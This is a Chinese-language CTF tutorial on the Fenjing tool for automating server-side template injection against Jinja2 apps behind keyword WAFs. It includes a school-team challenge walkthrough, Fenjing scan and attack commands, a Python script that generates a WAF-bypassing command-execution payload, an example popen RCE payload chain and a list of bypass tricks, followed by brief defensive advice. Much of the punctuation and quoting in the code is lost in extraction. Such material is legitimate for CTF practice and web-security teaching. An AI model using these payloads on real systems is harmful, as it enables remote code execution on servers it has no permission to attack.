CTF选手必备Fenjing全自动SSTI绕过WAF实战指南附校队真题解析在CTF比赛中SSTI服务器端模板注入漏洞一直是Web安全赛道的经典题型。随着WAFWeb应用防火墙规则日益复杂传统的手工payload构造方式往往难以奏效。本文将深入解析如何利用Fenjing这一自动化工具在实战中高效绕过WAF防护并结合校队真实题目演示完整解题流程。1. SSTI漏洞与WAF防护机制解析SSTI漏洞通常出现在使用模板引擎如Jinja2、Twig等的Web应用中。当用户输入被直接拼接到模板中时攻击者可以通过注入模板语法实现远程代码执行。典型的防御手段包括黑名单过滤阻止特定关键词如config、os、class等符号限制禁用[]、{}、_等特殊字符编码检测识别十六进制、Unicode等编码形式常见WAF规则示例blacklist [ config, self, g, os, class, length, mro, base, lipsum, [, , , _, ., , ~, {{, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 ]2. Fenjing工具核心功能解析Fenjing作为专为CTF设计的自动化工具主要提供三大核心功能2.1 智能扫描模式python -m fenjing scan -u http://target.com --detect-mode accurate自动检测SSTI注入点支持自定义请求头、Cookie等参数提供交互式命令执行界面2.2 表单攻击模式python -m fenjing crack -u http://target.com/form \ -i username,password -m POST自动识别表单参数绕过CSRF令牌等防护机制支持获取Flask配置信息2.3 可视化操作界面通过Web UI简化操作流程python -m fenjing webui3. 校队真题实战多层WAF绕过案例以下是我们校队招新赛的一道典型题目分析3.1 题目环境分析输入点两个文本输入框WAF规则禁止所有数字、引号、方括号等字符预期解法通过字符拼接实现命令执行3.2 自定义绕过脚本开发创建custom_bypass.pyfrom fenjing import exec_cmd_payload import logging logging.basicConfig(levellogging.INFO) def waf(s: str): blacklist [ config, self, g, os, class, length, mro, base, lipsum, [, , , _, ., , ~, {{, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 ] return all(word not in s for word in blacklist) if __name__ __main__: payload, _ exec_cmd_payload(waf, cat /flag) print(f生成payload: {payload})3.3 分步执行流程环境准备pipx install fenjing cd $(pipx runpip fenjing list | grep Location | cut -d -f2)Payload生成python custom_bypass.py结果验证# 输出示例 # ${request.application.__globals__.__builtins__.__import__(os).popen(cat${IFS}/flag).read()}4. 高阶技巧与防御建议4.1 进阶绕过方法限制条件绕过方案数字过滤使用True1、False0点号禁用使用字符串限制利用request.args参数传递4.2 防御措施建议严格限制模板引擎的上下文环境采用白名单而非黑名单过滤对用户输入进行HTML实体编码# 安全模板渲染示例 from jinja2 import Environment env Environment(autoescapeTrue) template env.from_string(safe_user_input)在实际比赛中建议先通过{{7*7}}等简单payload确认漏洞存在再逐步升级攻击复杂度。遇到特别严格的WAF时可以尝试组合使用以下技巧字符拼接flag代替flag编码转换利用\x66等十六进制表示属性链式调用request|attr(application)记住每个CTF环境可能有特殊限制需要灵活调整策略。